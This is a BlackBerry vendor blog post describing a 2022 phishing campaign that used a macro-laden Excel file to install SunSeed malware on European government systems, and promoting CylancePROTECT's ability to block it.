Skip Navigation
BlackBerry Blog

BlackBerry Prevents SunSeed Malware

CYBERSECURITY / 04.07.22 / Hector Diaz

The saying, “With chaos comes opportunity,” applies whether one is seeking to do good—or bad. The latter was evidenced by a recent phishing campaign put forth by a threat group seeking to take advantage of the turmoil in Ukraine to prey on European government personnel as they were assisting refugees.

Researchers discovered the attacker’s tactics resemble those of Ghostwriter—also known as TA445 or UNC1151, which was previously identified as working in the interests of Belarus. In this attack, the threat group used an email originating from a UKR[.]net address to formulate a new email containing a malicious Excel® document, then sent the weaponized message to a European government entity. UKR[.]net is a popular Ukrainian ISP and provider of personal email accounts. The email had the following subject line: “IN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE SECURITY COUNCIL OF UKRAINE DATED 24.02.2022.” Once a user opened the official-looking email and Excel file, the macro would install SunSeed malware onto the victim’s system.

Findings also indicated the “sender’s” email account used in the attack might belong to a member of the Ukrainian military, who may have been victim of an earlier phishing campaign targeting both civilians and soldiers in Ukraine.

To see how BlackBerry prevents SunSeed malware attacks from occurring, check out the video below.

DEMO VIDEO: BlackBerry vs. SunSeed Malware
Learn more about SunSeed Malware in our deep dive blog: Threat Thursday: SunSeed Malware Targets Ukraine Refugee Aid Efforts
Figure 1 – In this demonstration, we have an armed document with a malicious macro that serves as a downloader for SunSeed malware
Figure 2 – CylancePROTECT® stops the malware before it has an opportunity to cause any damage in the environment

Proven Protection Against This Attack

As the video shows, BlackBerry’s AI-driven, CylancePROTECT® endpoint protection platform (EPP) provides automated malware prevention, application and script control, memory protection, and device policy enforcement. 

BlackBerry Assistance

The BlackBerry Incident Response team can work with organizations of any size and across any vertical industry, to evaluate and enhance their endpoint security posture and proactively maintain the security, integrity, and resilience of their network infrastructure. 

For emergency assistance, please email us at, or use our handraiser form.


Video Transcript

In this quick video, we are going to demonstrate how CylancePROTECT® prevents SunSeed malware before it can cause any damage to the environment.

Here we have a sample of an armed document with a malicious macro that serves as a downloader for the SunSeed payload. As soon as we try to execute the malicious macro, our Script Control module intercepts the malicious attempt, successfully preventing SunSeed and terminating associated processes. 

Prevention is Possible with BlackBerry®

Hector Diaz

About Hector Diaz

 Senior Technical Marketing Manager at BlackBerry

Hector Diaz is a Senior Technical Marketing Manager for Latin America and the Caribbean at BlackBerry. Hector works with Engineering and Product Management to translate technology concepts into digestible pieces, evangelizing and educating people about Artificial Intelligence (AI) applied to cybersecurity.

With over 15 years of experience in cybersecurity, Hector is a respected professional who is in-demand at trade shows, partner training and customer engagements across Latin America and the Caribbean Region.